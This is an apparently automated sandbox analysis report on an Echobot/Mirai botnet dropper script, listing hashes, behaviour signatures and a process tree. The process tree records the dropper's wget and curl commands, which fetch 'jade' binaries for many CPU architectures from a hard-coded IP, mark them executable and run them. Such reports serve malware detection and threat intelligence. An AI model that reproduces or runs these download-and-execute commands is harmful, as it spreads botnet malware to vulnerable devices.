Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    28-10-2024 03:17

General

  • Target

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh

  • Size

    1KB

  • MD5

    a40d8e1695f7f86ab08feb9465a4d69e

  • SHA1

    48ce62e5415710d5b8d7f9d120842010f259909d

  • SHA256

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c

  • SHA512

    09e74caae29b43281aaca4e7a9a64667a85040184249c9cb9b9903109f8ec06782cbf7861129f905f895d8cc1516dab6969c2d9a174478c509b2d707e355268f

Malware Config

Signatures

  • Detected Echobot 3 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

  • Echobot family
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (224572) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    1⤵
    • Writes file to tmp directory
    PID:704
    • /usr/bin/wget
      wget http://5.59.248.145/bins/jade.x86
      2⤵
      • Writes file to tmp directory
      PID:706
    • /usr/bin/curl
      curl -O http://5.59.248.145/bins/jade.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:725
    • /bin/cat
      cat jade.x86
      2⤵
        PID:733
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:736
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:739
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:740
      • /bin/cat
        cat jade.mips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
        2⤵
        • File and Directory Permissions Modification
        PID:742
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:743
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:745
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:746
      • /bin/cat
        cat jade.mpsl
        2⤵
          PID:747
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:748
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:749
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm
          2⤵
          • Writes file to tmp directory
          PID:753
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm
          2⤵
          • Writes file to tmp directory
          PID:760
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:768
        • /tmp/cp
          ./cp arm
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:769
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm5
          2⤵
          • Writes file to tmp directory
          PID:817
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm5
          2⤵
          • Writes file to tmp directory
          PID:824
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:830
        • /tmp/cp
          ./cp arm5
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:831
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm6
          2⤵
          • Writes file to tmp directory
          PID:864
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm6
          2⤵
          • Writes file to tmp directory
          PID:871
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.mips jade.mpsl jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:873
        • /tmp/cp
          ./cp arm6
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:874
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm7
          2⤵
          • Writes file to tmp directory
          PID:878
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm7
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:885
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:887
        • /tmp/cp
          ./cp arm7
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:888
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.ppc
          2⤵
          • Writes file to tmp directory
          PID:892
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.ppc
          2⤵
          • Writes file to tmp directory
          PID:899
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.ppc jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:901
        • /tmp/cp
          ./cp ppc
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:902
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.m68k
          2⤵
          • Writes file to tmp directory
          PID:906
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.m68k
          2⤵
          • Writes file to tmp directory
          PID:913
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:915
        • /tmp/cp
          ./cp m68k
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:916
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.sh4
          2⤵
          • Writes file to tmp directory
          PID:920
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.sh4
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:927
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.sh4 jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:929
        • /tmp/cp
          ./cp sh4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:930

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • /tmp/cp

        Filesize

        95KB

        MD5

        5059c698bfa13806cb55d8aa9e6b9b95

        SHA1

        15b9be86d584a4dc8dda5362652ede9a3394ed7c

        SHA256

        da981a689f7e31471175bb11492fd8d68cdef6c62c0bfba2e2abb920766841c6

        SHA512

        4c2ece09c98aa200ff3ea2df0da176f39d20cb76a3604503c6d1b2a977fdb611cb8647c5485558db63f63d4e10c634ad464aa9337d378eab6aecb9546ee45929

      • /tmp/cp

        Filesize

        99KB

        MD5

        6d9c0a62ac0f74aa31e3b29e8ed657db

        SHA1

        ee08239789e1d5920cdac5dfa64e4ec4a867b393

        SHA256

        f166d6c0baffa303bf8e2e08d11966062a7d0024cfd57212f3ad7b069fad66b5

        SHA512

        fbb875076cc6b11a623973898ad59e4f01316ba0f86b273edb39639eb9ea3daf0bc061fe1ebd1d0d7111ae1ed2f68ec780ed64f230d1436cecbea6f2525501c2

      • /tmp/jade.x86

        Filesize

        68KB

        MD5

        9dae832b43230cdf6f41aeeb8aff1a30

        SHA1

        f399b7f5c4a08298d0a199ee27ab96a546f23c2e

        SHA256

        337f54805daa4730a201e251146a89820eb23aaa4604f681781c016b12c91c21

        SHA512

        ba90eb1d666d12933870c43acfb511ded11ce1c2105c2fda617865584713f31e323480e9c1e4cdbb6bdb5d694ed82b177e522a0e81c8486c90e1c1e9e54e521b